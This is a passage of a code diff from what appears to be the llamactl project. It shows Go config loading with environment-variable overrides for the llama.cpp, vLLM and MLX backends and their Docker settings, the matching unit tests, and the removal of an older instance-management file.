parseEnvVars(llamaEnv, cfg.Backends.LlamaCpp.Environment)
}
if llamaDockerEnabled := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ENABLED"); llamaDockerEnabled != "" {
if b, err := strconv.ParseBool(llamaDockerEnabled); err == nil {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
cfg.Backends.LlamaCpp.Docker.Enabled = b
}
}
if llamaDockerImage := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_IMAGE"); llamaDockerImage != "" {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
cfg.Backends.LlamaCpp.Docker.Image = llamaDockerImage
}
if llamaDockerArgs := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ARGS"); llamaDockerArgs != "" {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
cfg.Backends.LlamaCpp.Docker.Args = strings.Split(llamaDockerArgs, " ")
}
if llamaDockerEnv := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ENV"); llamaDockerEnv != "" {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
if cfg.Backends.LlamaCpp.Docker.Environment == nil {
cfg.Backends.LlamaCpp.Docker.Environment = make(map[string]string)
}
parseEnvVars(llamaDockerEnv, cfg.Backends.LlamaCpp.Docker.Environment)
}
// vLLM backend
if vllmCmd := os.Getenv("LLAMACTL_VLLM_COMMAND"); vllmCmd != "" {
cfg.Backends.VLLM.Command = vllmCmd
}
if vllmArgs := os.Getenv("LLAMACTL_VLLM_ARGS"); vllmArgs != "" {
cfg.Backends.VLLM.Args = strings.Split(vllmArgs, " ")
}
if vllmEnv := os.Getenv("LLAMACTL_VLLM_ENV"); vllmEnv != "" {
if cfg.Backends.VLLM.Environment == nil {
cfg.Backends.VLLM.Environment = make(map[string]string)
}
parseEnvVars(vllmEnv, cfg.Backends.VLLM.Environment)
}
if vllmDockerEnabled := os.Getenv("LLAMACTL_VLLM_DOCKER_ENABLED"); vllmDockerEnabled != "" {
if b, err := strconv.ParseBool(vllmDockerEnabled); err == nil {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
cfg.Backends.VLLM.Docker.Enabled = b
}
}
if vllmDockerImage := os.Getenv("LLAMACTL_VLLM_DOCKER_IMAGE"); vllmDockerImage != "" {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
cfg.Backends.VLLM.Docker.Image = vllmDockerImage
}
if vllmDockerArgs := os.Getenv("LLAMACTL_VLLM_DOCKER_ARGS"); vllmDockerArgs != "" {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
cfg.Backends.VLLM.Docker.Args = strings.Split(vllmDockerArgs, " ")
}
if vllmDockerEnv := os.Getenv("LLAMACTL_VLLM_DOCKER_ENV"); vllmDockerEnv != "" {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
if cfg.Backends.VLLM.Docker.Environment == nil {
cfg.Backends.VLLM.Docker.Environment = make(map[string]string)
}
parseEnvVars(vllmDockerEnv, cfg.Backends.VLLM.Docker.Environment)
}
// MLX backend
if mlxCmd := os.Getenv("LLAMACTL_MLX_COMMAND"); mlxCmd != "" {
cfg.Backends.MLX.Command = mlxCmd
}
if mlxArgs := os.Getenv("LLAMACTL_MLX_ARGS"); mlxArgs != "" {
cfg.Backends.MLX.Args = strings.Split(mlxArgs, " ")
}
if mlxEnv := os.Getenv("LLAMACTL_MLX_ENV"); mlxEnv != "" {
if cfg.Backends.MLX.Environment == nil {
cfg.Backends.MLX.Environment = make(map[string]string)
}
parseEnvVars(mlxEnv, cfg.Backends.MLX.Environment)
}
// Instance defaults
if autoRestart := os.Getenv("LLAMACTL_DEFAULT_AUTO_RESTART"); autoRestart != "" {
if b, err := strconv.ParseBool(autoRestart); err == nil {
cfg.Instances.DefaultAutoRestart = b
}
}
if maxRestarts := os.Getenv("LLAMACTL_DEFAULT_MAX_RESTARTS"); maxRestarts != "" {
if m, err := strconv.Atoi(maxRestarts); err == nil {
cfg.Instances.DefaultMaxRestarts = m
}
}
if restartDelay := os.Getenv("LLAMACTL_DEFAULT_RESTART_DELAY"); restartDelay != "" {
if seconds, err := strconv.Atoi(restartDelay); err == nil {
cfg.Instances.DefaultRestartDelay = seconds
}
}
if onDemandStart := os.Getenv("LLAMACTL_DEFAULT_ON_DEMAND_START"); onDemandStart != "" {
if b, err := strconv.ParseBool(onDemandStart); err == nil {
cfg.Instances.DefaultOnDemandStart = b
}
}
if onDemandTimeout := os.Getenv("LLAMACTL_ON_DEMAND_START_TIMEOUT"); onDemandTimeout != "" {
if seconds, err := strconv.Atoi(onDemandTimeout); err == nil {
cfg.Instances.OnDemandStartTimeout = seconds
}
}
if timeoutCheckInterval := os.Getenv("LLAMACTL_TIMEOUT_CHECK_INTERVAL"); timeoutCheckInterval != "" {
if minutes, err := strconv.Atoi(timeoutCheckInterval); err == nil {
cfg.Instances.TimeoutCheckInterval = minutes
}
}
// Auth config
if requireInferenceAuth := os.Getenv("LLAMACTL_REQUIRE_INFERENCE_AUTH"); requireInferenceAuth != "" {
if b, err := strconv.ParseBool(requireInferenceAuth); err == nil {
cfg.Auth.RequireInferenceAuth = b
}
}
if inferenceKeys := os.Getenv("LLAMACTL_INFERENCE_KEYS"); inferenceKeys != "" {
cfg.Auth.InferenceKeys = strings.Split(inferenceKeys, ",")
}
if requireManagementAuth := os.Getenv("LLAMACTL_REQUIRE_MANAGEMENT_AUTH"); requireManagementAuth != "" {
if b, err := strconv.ParseBool(requireManagementAuth); err == nil {
cfg.Auth.RequireManagementAuth = b
}
}
if managementKeys := os.Getenv("LLAMACTL_MANAGEMENT_KEYS"); managementKeys != "" {
cfg.Auth.ManagementKeys = strings.Split(managementKeys, ",")
}
}
// ParsePortRange parses port range from string formats like "8000-9000" or "8000,9000"
func ParsePortRange(s string) [2]int {
var parts []string
// Try both separators
if strings.Contains(s, "-") {
parts = strings.Split(s, "-")
} else if strings.Contains(s, ",") {
parts = strings.Split(s, ",")
}
// Parse the two parts
if len(parts) == 2 {
start, err1 := strconv.Atoi(strings.TrimSpace(parts[0]))
end, err2 := strconv.Atoi(strings.TrimSpace(parts[1]))
if err1 == nil && err2 == nil {
return [2]int{start, end}
}
}
return [2]int{0, 0} // Invalid format
}
// parseEnvVars parses environment variables in format "KEY1=value1,KEY2=value2"
// and populates the provided environment map
func parseEnvVars(envString string, envMap map[string]string) {
if envString == "" {
return
}
for _, envPair := range strings.Split(envString, ",") {
if parts := strings.SplitN(strings.TrimSpace(envPair), "=", 2); len(parts) == 2 {
envMap[parts[0]] = parts[1]
}
}
}
// getDefaultDataDirectory returns platform-specific default data directory
func getDefaultDataDirectory() string {
switch runtime.GOOS {
case "windows":
// Try PROGRAMDATA first (system-wide), fallback to LOCALAPPDATA (user)
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
return filepath.Join(programData, "llamactl")
}
if localAppData := os.Getenv("LOCALAPPDATA"); localAppData != "" {
return filepath.Join(localAppData, "llamactl")
}
return "C:\\ProgramData\\llamactl" // Final fallback
case "darwin":
// For macOS, use user's Application Support directory
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
return filepath.Join(homeDir, "Library", "Application Support", "llamactl")
}
return "/usr/local/var/llamactl" // Fallback
default:
// Linux and other Unix-like systems
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
return filepath.Join(homeDir, ".local", "share", "llamactl")
}
return "/var/lib/llamactl" // Final fallback
}
}
// getDefaultConfigLocations returns platform-specific config file locations
func getDefaultConfigLocations() []string {
var locations []string
// Use ./llamactl.yaml and ./config.yaml as the default config file
locations = append(locations, "llamactl.yaml")
locations = append(locations, "config.yaml")
homeDir, _ := os.UserHomeDir()
switch runtime.GOOS {
case "windows":
// Windows: Use APPDATA if available, else user home, fallback to ProgramData
if appData := os.Getenv("APPDATA"); appData != "" {
locations = append(locations, filepath.Join(appData, "llamactl", "config.yaml"))
} else if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, "llamactl", "config.yaml"))
}
locations = append(locations, filepath.Join(os.Getenv("PROGRAMDATA"), "llamactl", "config.yaml"))
case "darwin":
// macOS: Use Application Support in user home, fallback to /Library/Application Support
if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"))
}
locations = append(locations, "/Library/Application Support/llamactl/config.yaml")
default:
// Linux/Unix: Use ~/.config/llamactl/config.yaml, fallback to /etc/llamactl/config.yaml
if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, ".config", "llamactl", "config.yaml"))
}
locations = append(locations, "/etc/llamactl/config.yaml")
}
return locations
}
// GetBackendSettings resolves backend settings
func (bc *BackendConfig) GetBackendSettings(backendType string) BackendSettings {
switch backendType {
case "llama-cpp":
return bc.LlamaCpp
case "vllm":
return bc.VLLM
case "mlx":
return bc.MLX
default:
return BackendSettings{}
}
}

View File

@@ -1,16 +1,15 @@
package llamactl_test
package config_test
import (
"llamactl/pkg/config"
"os"
"path/filepath"
"testing"
llamactl "llamactl/pkg"
)
func TestLoadConfig_Defaults(t *testing.T) {
// Test loading config when no file exists and no env vars set
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig should not error with defaults: %v", err)
}
@@ -22,18 +21,27 @@ func TestLoadConfig_Defaults(t *testing.T) {
if cfg.Server.Port != 8080 {
t.Errorf("Expected default port to be 8080, got %d", cfg.Server.Port)
}
homedir, err := os.UserHomeDir()
if err != nil {
t.Fatalf("Failed to get user home directory: %v", err)
}
if cfg.Instances.InstancesDir != filepath.Join(homedir, ".local", "share", "llamactl", "instances") {
t.Errorf("Expected default instances directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "instances"), cfg.Instances.InstancesDir)
}
if cfg.Instances.LogsDir != filepath.Join(homedir, ".local", "share", "llamactl", "logs") {
t.Errorf("Expected default logs directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "logs"), cfg.Instances.LogsDir)
}
if !cfg.Instances.AutoCreateDirs {
t.Error("Expected default instances auto-create to be true")
}
if cfg.Instances.PortRange != [2]int{8000, 9000} {
t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
}
if cfg.Instances.LogDirectory != "/tmp/llamactl" {
t.Errorf("Expected default log directory '/tmp/llamactl', got %q", cfg.Instances.LogDirectory)
}
if cfg.Instances.MaxInstances != -1 {
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
}
if cfg.Instances.LlamaExecutable != "llama-server" {
t.Errorf("Expected default executable 'llama-server', got %q", cfg.Instances.LlamaExecutable)
}
if !cfg.Instances.DefaultAutoRestart {
t.Error("Expected default auto restart to be true")
}
@@ -56,7 +64,7 @@ server:
port: 9090
instances:
port_range: [7000, 8000]
log_directory: "/custom/logs"
logs_dir: "/custom/logs"
max_instances: 5
llama_executable: "/usr/bin/llama-server"
default_auto_restart: false
@@ -69,7 +77,7 @@ instances:
t.Fatalf("Failed to write test config file: %v", err)
}
cfg, err := llamactl.LoadConfig(configFile)
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -84,15 +92,12 @@ instances:
if cfg.Instances.PortRange != [2]int{7000, 8000} {
t.Errorf("Expected port range [7000, 8000], got %v", cfg.Instances.PortRange)
}
if cfg.Instances.LogDirectory != "/custom/logs" {
t.Errorf("Expected log directory '/custom/logs', got %q", cfg.Instances.LogDirectory)
if cfg.Instances.LogsDir != "/custom/logs" {
t.Errorf("Expected logs directory '/custom/logs', got %q", cfg.Instances.LogsDir)
}
if cfg.Instances.MaxInstances != 5 {
t.Errorf("Expected max instances 5, got %d", cfg.Instances.MaxInstances)
}
if cfg.Instances.LlamaExecutable != "/usr/bin/llama-server" {
t.Errorf("Expected executable '/usr/bin/llama-server', got %q", cfg.Instances.LlamaExecutable)
}
if cfg.Instances.DefaultAutoRestart {
t.Error("Expected auto restart to be false")
}
@@ -110,9 +115,8 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
"LLAMACTL_HOST": "0.0.0.0",
"LLAMACTL_PORT": "3000",
"LLAMACTL_INSTANCE_PORT_RANGE": "5000-6000",
"LLAMACTL_LOG_DIR": "/env/logs",
"LLAMACTL_LOGS_DIR": "/env/logs",
"LLAMACTL_MAX_INSTANCES": "20",
"LLAMACTL_LLAMA_EXECUTABLE": "/env/llama-server",
"LLAMACTL_DEFAULT_AUTO_RESTART": "false",
"LLAMACTL_DEFAULT_MAX_RESTARTS": "7",
"LLAMACTL_DEFAULT_RESTART_DELAY": "15",
@@ -124,7 +128,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
defer os.Unsetenv(key)
}
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -139,14 +143,14 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
if cfg.Instances.PortRange != [2]int{5000, 6000} {
t.Errorf("Expected port range [5000, 6000], got %v", cfg.Instances.PortRange)
}
if cfg.Instances.LogDirectory != "/env/logs" {
t.Errorf("Expected log directory '/env/logs', got %q", cfg.Instances.LogDirectory)
if cfg.Instances.LogsDir != "/env/logs" {
t.Errorf("Expected logs directory '/env/logs', got %q", cfg.Instances.LogsDir)
}
if cfg.Instances.MaxInstances != 20 {
t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances)
}
if cfg.Instances.LlamaExecutable != "/env/llama-server" {
t.Errorf("Expected executable '/env/llama-server', got %q", cfg.Instances.LlamaExecutable)
if cfg.Backends.LlamaCpp.Command != "llama-server" {
t.Errorf("Expected default llama command 'llama-server', got %q", cfg.Backends.LlamaCpp.Command)
}
if cfg.Instances.DefaultAutoRestart {
t.Error("Expected auto restart to be false")
@@ -183,7 +187,7 @@ instances:
defer os.Unsetenv("LLAMACTL_HOST")
defer os.Unsetenv("LLAMACTL_MAX_INSTANCES")
cfg, err := llamactl.LoadConfig(configFile)
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -219,7 +223,7 @@ instances:
t.Fatalf("Failed to write test config file: %v", err)
}
_, err = llamactl.LoadConfig(configFile)
_, err = config.LoadConfig(configFile)
if err == nil {
t.Error("Expected LoadConfig to return error for invalid YAML")
}
@@ -245,7 +249,7 @@ func TestParsePortRange(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result := llamactl.ParsePortRange(tt.input)
result := config.ParsePortRange(tt.input)
if result != tt.expected {
t.Errorf("ParsePortRange(%q) = %v, expected %v", tt.input, result, tt.expected)
}
@@ -260,31 +264,31 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
testCases := []struct {
envVar string
envValue string
checkFn func(*llamactl.Config) bool
checkFn func(*config.AppConfig) bool
desc string
}{
{
envVar: "LLAMACTL_PORT",
envValue: "invalid-port",
checkFn: func(c *llamactl.Config) bool { return c.Server.Port == 8080 }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default
desc: "invalid port number should keep default",
},
{
envVar: "LLAMACTL_MAX_INSTANCES",
envValue: "not-a-number",
checkFn: func(c *llamactl.Config) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
desc: "invalid max instances should keep default",
},
{
envVar: "LLAMACTL_DEFAULT_AUTO_RESTART",
envValue: "invalid-bool",
checkFn: func(c *llamactl.Config) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
desc: "invalid boolean should keep default",
},
{
envVar: "LLAMACTL_INSTANCE_PORT_RANGE",
envValue: "invalid-range",
checkFn: func(c *llamactl.Config) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
desc: "invalid port range should keep default",
},
}
@@ -294,7 +298,7 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
os.Setenv(tc.envVar, tc.envValue)
defer os.Unsetenv(tc.envVar)
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -323,7 +327,7 @@ server:
t.Fatalf("Failed to write test config file: %v", err)
}
cfg, err := llamactl.LoadConfig(configFile)
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -344,3 +348,165 @@ server:
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
}
}
func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
bc := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "custom-llama",
Args: []string{"--verbose"},
Docker: &config.DockerSettings{
Enabled: true,
Image: "custom-llama:latest",
Args: []string{"--gpus", "all"},
Environment: map[string]string{"CUDA_VISIBLE_DEVICES": "1"},
},
},
VLLM: config.BackendSettings{
Command: "custom-vllm",
Args: []string{"serve", "--debug"},
},
MLX: config.BackendSettings{
Command: "custom-mlx",
Args: []string{},
},
}
// Test llama-cpp with Docker
settings := bc.GetBackendSettings("llama-cpp")
if settings.Command != "custom-llama" {
t.Errorf("Expected command 'custom-llama', got %q", settings.Command)
}
if len(settings.Args) != 1 || settings.Args[0] != "--verbose" {
t.Errorf("Expected args ['--verbose'], got %v", settings.Args)
}
if settings.Docker == nil || !settings.Docker.Enabled {
t.Error("Expected Docker to be enabled")
}
if settings.Docker.Image != "custom-llama:latest" {
t.Errorf("Expected Docker image 'custom-llama:latest', got %q", settings.Docker.Image)
}
// Test vLLM without Docker
settings = bc.GetBackendSettings("vllm")
if settings.Command != "custom-vllm" {
t.Errorf("Expected command 'custom-vllm', got %q", settings.Command)
}
if len(settings.Args) != 2 || settings.Args[0] != "serve" || settings.Args[1] != "--debug" {
t.Errorf("Expected args ['serve', '--debug'], got %v", settings.Args)
}
if settings.Docker != nil && settings.Docker.Enabled {
t.Error("Expected Docker to be disabled or nil")
}
// Test MLX
settings = bc.GetBackendSettings("mlx")
if settings.Command != "custom-mlx" {
t.Errorf("Expected command 'custom-mlx', got %q", settings.Command)
}
}
func TestGetBackendSettings_EmptyConfig(t *testing.T) {
bc := &config.BackendConfig{}
// Test empty llama-cpp
settings := bc.GetBackendSettings("llama-cpp")
if settings.Command != "" {
t.Errorf("Expected empty command, got %q", settings.Command)
}
// Test empty vLLM
settings = bc.GetBackendSettings("vllm")
if settings.Command != "" {
t.Errorf("Expected empty command, got %q", settings.Command)
}
// Test empty MLX
settings = bc.GetBackendSettings("mlx")
if settings.Command != "" {
t.Errorf("Expected empty command, got %q", settings.Command)
}
}
func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
// Test that backend environment variables work correctly
envVars := map[string]string{
"LLAMACTL_LLAMACPP_COMMAND": "env-llama",
"LLAMACTL_LLAMACPP_ARGS": "--verbose --threads 4",
"LLAMACTL_LLAMACPP_DOCKER_ENABLED": "true",
"LLAMACTL_LLAMACPP_DOCKER_IMAGE": "env-llama:latest",
"LLAMACTL_LLAMACPP_DOCKER_ARGS": "run --rm --network host --gpus all",
"LLAMACTL_LLAMACPP_DOCKER_ENV": "CUDA_VISIBLE_DEVICES=0,OMP_NUM_THREADS=4",
"LLAMACTL_VLLM_COMMAND": "env-vllm",
"LLAMACTL_VLLM_DOCKER_ENABLED": "false",
"LLAMACTL_VLLM_DOCKER_IMAGE": "env-vllm:latest",
"LLAMACTL_VLLM_DOCKER_ENV": "PYTORCH_CUDA_ALLOC_CONF=max_split_size_mb:512,CUDA_VISIBLE_DEVICES=1",
"LLAMACTL_MLX_COMMAND": "env-mlx",
}
// Set env vars and ensure cleanup
for key, value := range envVars {
os.Setenv(key, value)
defer os.Unsetenv(key)
}
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
// Verify llama-cpp environment overrides
if cfg.Backends.LlamaCpp.Command != "env-llama" {
t.Errorf("Expected llama command 'env-llama', got %q", cfg.Backends.LlamaCpp.Command)
}
expectedArgs := []string{"--verbose", "--threads", "4"}
if len(cfg.Backends.LlamaCpp.Args) != len(expectedArgs) {
t.Errorf("Expected llama args %v, got %v", expectedArgs, cfg.Backends.LlamaCpp.Args)
}
if !cfg.Backends.LlamaCpp.Docker.Enabled {
t.Error("Expected llama Docker to be enabled")
}
if cfg.Backends.LlamaCpp.Docker.Image != "env-llama:latest" {
t.Errorf("Expected llama Docker image 'env-llama:latest', got %q", cfg.Backends.LlamaCpp.Docker.Image)
}
expectedDockerArgs := []string{"run", "--rm", "--network", "host", "--gpus", "all"}
if len(cfg.Backends.LlamaCpp.Docker.Args) != len(expectedDockerArgs) {
t.Errorf("Expected llama Docker args %v, got %v", expectedDockerArgs, cfg.Backends.LlamaCpp.Docker.Args)
}
if cfg.Backends.LlamaCpp.Docker.Environment["CUDA_VISIBLE_DEVICES"] != "0" {
t.Errorf("Expected CUDA_VISIBLE_DEVICES=0, got %q", cfg.Backends.LlamaCpp.Docker.Environment["CUDA_VISIBLE_DEVICES"])
}
if cfg.Backends.LlamaCpp.Docker.Environment["OMP_NUM_THREADS"] != "4" {
t.Errorf("Expected OMP_NUM_THREADS=4, got %q", cfg.Backends.LlamaCpp.Docker.Environment["OMP_NUM_THREADS"])
}
// Verify vLLM environment overrides
if cfg.Backends.VLLM.Command != "env-vllm" {
t.Errorf("Expected vLLM command 'env-vllm', got %q", cfg.Backends.VLLM.Command)
}
if cfg.Backends.VLLM.Docker.Enabled {
t.Error("Expected vLLM Docker to be disabled")
}
if cfg.Backends.VLLM.Docker.Environment["PYTORCH_CUDA_ALLOC_CONF"] != "max_split_size_mb:512" {
t.Errorf("Expected PYTORCH_CUDA_ALLOC_CONF=max_split_size_mb:512, got %q", cfg.Backends.VLLM.Docker.Environment["PYTORCH_CUDA_ALLOC_CONF"])
}
// Verify MLX environment overrides
if cfg.Backends.MLX.Command != "env-mlx" {
t.Errorf("Expected MLX command 'env-mlx', got %q", cfg.Backends.MLX.Command)
}
}
func TestGetBackendSettings_InvalidBackendType(t *testing.T) {
bc := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
}
// Test invalid backend type returns empty settings
settings := bc.GetBackendSettings("invalid-backend")
if settings.Command != "" {
t.Errorf("Expected empty command for invalid backend, got %q", settings.Command)
}
}

View File

@@ -1,270 +0,0 @@
package llamactl
import (
"context"
"encoding/json"
"fmt"
"io"
"log"
"net/http"
"net/http/httputil"
"net/url"
"os/exec"
"sync"
"time"
)
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
// RestartDelay duration in seconds
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
LlamaServerOptions `json:",inline"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
// This is needed because the embedded LlamaServerOptions has its own UnmarshalJSON
// which can interfere with proper unmarshaling of the pointer fields
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// First, unmarshal into a temporary struct without the embedded type
type tempCreateOptions struct {
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
}
var temp tempCreateOptions
if err := json.Unmarshal(data, &temp); err != nil {
return err
}
// Copy the pointer fields
c.AutoRestart = temp.AutoRestart
c.MaxRestarts = temp.MaxRestarts
c.RestartDelay = temp.RestartDelay
// Now unmarshal the embedded LlamaServerOptions
if err := json.Unmarshal(data, &c.LlamaServerOptions); err != nil {
return err
}
return nil
}
// Instance represents a running instance of the llama server
type Instance struct {
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
globalSettings *InstancesConfig
// Status
Running bool `json:"running"`
// Creation time
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
// Logging file
logger *InstanceLogger `json:"-"`
// internal
cmd *exec.Cmd `json:"-"` // Command to run the instance
ctx context.Context `json:"-"` // Context for managing the instance lifecycle
cancel context.CancelFunc `json:"-"` // Function to cancel the context
stdout io.ReadCloser `json:"-"` // Standard output stream
stderr io.ReadCloser `json:"-"` // Standard error stream
mu sync.RWMutex `json:"-"` // RWMutex for better read/write separation
restarts int `json:"-"` // Number of restarts
proxy *httputil.ReverseProxy `json:"-"` // Reverse proxy for this instance
// Restart control
restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
monitorDone chan struct{} `json:"-"` // Channel to signal monitor goroutine completion
}
// validateAndCopyOptions validates and creates a deep copy of the provided options
// It applies validation rules and returns a safe copy
func validateAndCopyOptions(name string, options *CreateInstanceOptions) *CreateInstanceOptions {
optionsCopy := &CreateInstanceOptions{}
if options != nil {
// Copy the embedded LlamaServerOptions
optionsCopy.LlamaServerOptions = options.LlamaServerOptions
// Copy and validate pointer fields
if options.AutoRestart != nil {
autoRestart := *options.AutoRestart
optionsCopy.AutoRestart = &autoRestart
}
if options.MaxRestarts != nil {
maxRestarts := *options.MaxRestarts
if maxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, maxRestarts)
maxRestarts = 0
}
optionsCopy.MaxRestarts = &maxRestarts
}
if options.RestartDelay != nil {
restartDelay := *options.RestartDelay
if restartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, restartDelay)
restartDelay = 0
}
optionsCopy.RestartDelay = &restartDelay
}
}
return optionsCopy
}
// applyDefaultOptions applies default values from global settings to any nil options
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *InstancesConfig) {
if globalSettings == nil {
return
}
if options.AutoRestart == nil {
defaultAutoRestart := globalSettings.DefaultAutoRestart
options.AutoRestart = &defaultAutoRestart
}
if options.MaxRestarts == nil {
defaultMaxRestarts := globalSettings.DefaultMaxRestarts
options.MaxRestarts = &defaultMaxRestarts
}
if options.RestartDelay == nil {
defaultRestartDelay := globalSettings.DefaultRestartDelay
options.RestartDelay = &defaultRestartDelay
}
}
// NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalSettings *InstancesConfig, options *CreateInstanceOptions) *Instance {
// Validate and copy options
optionsCopy := validateAndCopyOptions(name, options)
// Apply defaults
applyDefaultOptions(optionsCopy, globalSettings)
// Create the instance logger
logger := NewInstanceLogger(name, globalSettings.LogDirectory)
return &Instance{
Name: name,
options: optionsCopy,
globalSettings: globalSettings,
logger: logger,
Running: false,
Created: time.Now().Unix(),
}
}
func (i *Instance) GetOptions() *CreateInstanceOptions {
i.mu.RLock()
defer i.mu.RUnlock()
return i.options
}
func (i *Instance) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock()
defer i.mu.Unlock()
if options == nil {
log.Println("Warning: Attempted to set nil options on instance", i.Name)
return
}
// Validate and copy options and apply defaults
optionsCopy := validateAndCopyOptions(i.Name, options)
applyDefaultOptions(optionsCopy, i.globalSettings)
i.options = optionsCopy
// Clear the proxy so it gets recreated with new options
i.proxy = nil
}
// GetProxy returns the reverse proxy for this instance, creating it if needed
func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
i.mu.Lock()
defer i.mu.Unlock()
if i.proxy != nil {
return i.proxy, nil
}
if i.options == nil {
return nil, fmt.Errorf("instance %s has no options set", i.Name)
}
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", i.options.Host, i.options.Port))
if err != nil {
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
}
proxy := httputil.NewSingleHostReverseProxy(targetURL)
proxy.ModifyResponse = func(resp *http.Response) error {
// Remove CORS headers from llama-server response to avoid conflicts
// llamactl will add its own CORS headers
resp.Header.Del("Access-Control-Allow-Origin")
resp.Header.Del("Access-Control-Allow-Methods")
resp.Header.Del("Access-Control-Allow-Headers")
resp.Header.Del("Access-Control-Allow-Credentials")
resp.Header.Del("Access-Control-Max-Age")
resp.Header.Del("Access-Control-Expose-Headers")
return nil
}
i.proxy = proxy
return i.proxy, nil
}
// MarshalJSON implements json.Marshaler for Instance
func (i *Instance) MarshalJSON() ([]byte, error) {
// Use read lock since we're only reading data
i.mu.RLock()
defer i.mu.RUnlock()
// Create a temporary struct with exported fields for JSON marshalling
temp := struct {
Name string `json:"name"`
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
}{
Name: i.Name,
Options: i.options,
Running: i.Running,
}
return json.Marshal(temp)
}
// UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Instance) UnmarshalJSON(data []byte) error {
// Create a temporary struct for unmarshalling
temp := struct {
Name string `json:"name"`
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
}{}
if err := json.Unmarshal(data, &temp); err != nil {
return err
}
// Set the fields
i.Name = temp.Name
i.Running = temp.Running
// Handle options with validation but no defaults
if temp.Options != nil {
i.options = validateAndCopyOptions(i.Name, temp.Options)
}
return nil
}

276
pkg/instance/instance.go Normal file
View File

@@ -0,0 +1,276 @@
package instance
import (
